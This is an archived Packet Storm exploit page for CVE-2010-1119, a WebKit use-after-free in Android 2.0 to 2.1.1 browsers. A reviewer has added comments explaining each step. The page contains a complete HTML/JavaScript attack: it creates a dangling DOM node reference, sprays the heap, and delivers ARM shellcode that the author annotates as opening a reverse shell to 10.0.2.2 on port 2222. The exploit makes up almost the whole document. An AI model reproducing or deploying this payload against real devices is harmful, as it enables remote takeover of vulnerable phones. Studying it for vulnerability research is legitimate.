packetstormMJ KeithPACKETSTORM:99300

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

2011-03-14 00:00:00
MJ Keith
packetstormsecurity.com
22

0.941 High

EPSS

Percentile

99.0%

`<html>  
<!--  
# Exploit Title: android exploit for 2010-1119 use after free  
# Date: 2011/03/11  
# Author: MJ Keith  
# Software Link: http://www.android.com/  
# Version: 2.0 ,2.1 , 2.1.1  
# Tested on: Android  
# CVE : 2010-1119  
  
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides  
email: mkeith AT exploitscience.org  
-->  
  
<!--
Review notes (added):
- Proof-of-concept for the WebKit use-after-free tracked as CVE-2010-1119 on
  the Android versions listed above. Everything happens client-side in the
  heap() function below, which the body's onload handler calls once.
- Sequence as written: detach an element and remove its id attribute's text
  node while keeping a reference to that node; then, on a timer, churn the
  allocator, write a large number of long strings into the document, and
  finally read a property through the stale reference.
- The listing is rendered with two-space line endings and one string literal
  split across two lines after a backslash (see the NOTE inside heap()); it
  may not parse verbatim as pasted.
-->
<head>  
<!-- NOTE(review): `language` is a deprecated attribute; left as the author wrote it. -->
<script language="JavaScript">  
// heap(): creates the dangling reference for the use-after-free, then on a
// zero-delay timer fills the heap with attacker-chosen string data and
// touches the freed node. Takes no parameters and returns nothing; all of
// its effects are on the document and on two implicit globals (`nodes`,
// `target`).
function heap()  
{  
  
// --- Step 1: create the dangling reference ---
// Look up <p id="target">, take its `id` attribute node, and keep the
// attribute's childNodes collection (`nodes` is an implicit global — no
// `var` — so the timer callback below can reach it).
var id = document.getElementById("target");  
var attribute = id.getAttributeNode('id');  
nodes = attribute.childNodes;  
// Detach the element from the document, then remove the attribute's first
// child node. The collection saved above is what the code later uses to get
// back at that removed node.
document.body.removeChild(id);  
attribute.removeChild(nodes[0]);  
// --- Step 2: deferred heap grooming (runs after the current task ends) ---
// 70000 throw-away "XX" strings (0x58 0x58) are allocated and dropped first;
// the author does not state the purpose — presumably to churn the allocator
// before the spray below.
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };  
  
  
// Two 2-code-unit seeds: `scode` is a filler pattern of 0x60 ("`") bytes,
// `scode2` is the pattern sprayed in the later slots. The author does not
// document which part of the freed object each one is meant to overlap.
var scode = unescape("\u0060\u0060");  
var scode2 = unescape("\u5005\ue1a0");  
// `shell` is the payload appended to the spray: opaque machine code for the
// target device, left undecoded here. The trailing comments are the author's
// own annotation of the two constants patched onto its end.
// NOTE(review): in this rendering the literal is split after a trailing
// backslash with whitespace following it; a JS line continuation is only
// valid when the backslash is the last character on the line.
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\  
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");  
shell += unescape("\uae08"); // Port = 2222  
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2  
shell += unescape("\u2000\u2000"); // string terminate  
  
// Double both buffers until `scode` is longer than 0x1000 code units. Both
// start at 2 units and are doubled the same number of times, so both end at
// 0x2000 units.
do  
{  
scode += scode;  
scode2 += scode2;  
  
} while (scode.length<=0x1000);  
  
// The payload is appended once, after the doubling, so it sits once at the
// end of every `scode2` slot written below.
scode2 += shell  
  
  
// --- Step 3: spray and trigger ---
// Write 300 slots into the document: slots 0..129 get the filler, slots
// 131..299 get pattern+payload. Slot 130 satisfies neither condition, so
// target[130] is undefined and the text "undefined" is written for it — an
// apparent off-by-one in the author's two conditions, harmless to the page.
// `target` is another implicit global.
target = new Array();  
for(i = 0; i < 300; i++){  
  
if (i<130){ target[i] = scode;}  
if (i>130){ target[i] = scode2;}  
  
document.write(target[i]);  
document.write("<br />");  
// From slot 251 onward, read a property through the saved collection on
// every iteration. Given the title, this access to the node removed in
// Step 1 is the "use" half of the use-after-free; what it resolves to
// depends on how this WebKit build handles the removed node. The
// commented-out alert is a debugging hook the author left in place.
if (i>250){  
// alert("freeze");  
nodes[0].textContent}  
  
}  
  
}, 0);  
}  
</script>  
</head>  
<!-- NOTE(review): inline handler and unquoted attribute values kept as the author wrote them. -->
<body onload=heap()>  
<p id=target></p>  
</body>  
</html>  
  
`